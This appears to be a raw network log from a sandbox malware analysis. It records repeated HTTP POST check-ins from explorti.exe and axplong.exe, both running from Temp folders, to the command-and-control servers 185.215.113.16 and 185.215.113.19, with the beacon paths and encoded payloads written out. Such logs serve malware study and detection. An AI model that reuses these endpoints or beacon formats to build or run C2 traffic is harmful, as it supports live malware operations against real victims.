Jul 26, 2024 17:58:16.179164886 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:16.944282055 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.5	61514	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:16.481415033 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:17.246470928 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.5	61516	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:17.074811935 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:17.856359959 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:17.865506887 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:18.129224062 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.5	61517	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:17.257498980 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:17.999052048 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.5	61518	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:18.134743929 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:18.907737970 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:18.910980940 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:19.205130100 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.5	61519	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:18.260036945 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:19.056337118 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:19.061856985 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:19.341881990 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.5	61520	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:19.337635994 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:20.136796951 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.5	61521	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:19.469011068 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:20.229666948 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:20.237234116 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:20.483560085 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.5	61522	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:20.149321079 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:20.912575960 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.5	61527	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:20.642227888 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:21.403031111 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:21.410592079 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:21.660883904 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.5	61528	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:21.048063040 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:21.814068079 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:21.827996016 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:22.096564054 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.5	55733	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:21.784168959 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:22.581933022 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.5	55745	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:22.228080034 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:23.037708998 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.5	55749	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:22.594506025 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:23.378797054 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.5	55753	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:23.057512999 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:23.884255886 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.5	55758	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:23.504286051 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:24.274390936 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.5	55760	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:23.999588966 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:24.811969042 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.5	55769	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:24.294552088 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:25.107228041 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.5	55771	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
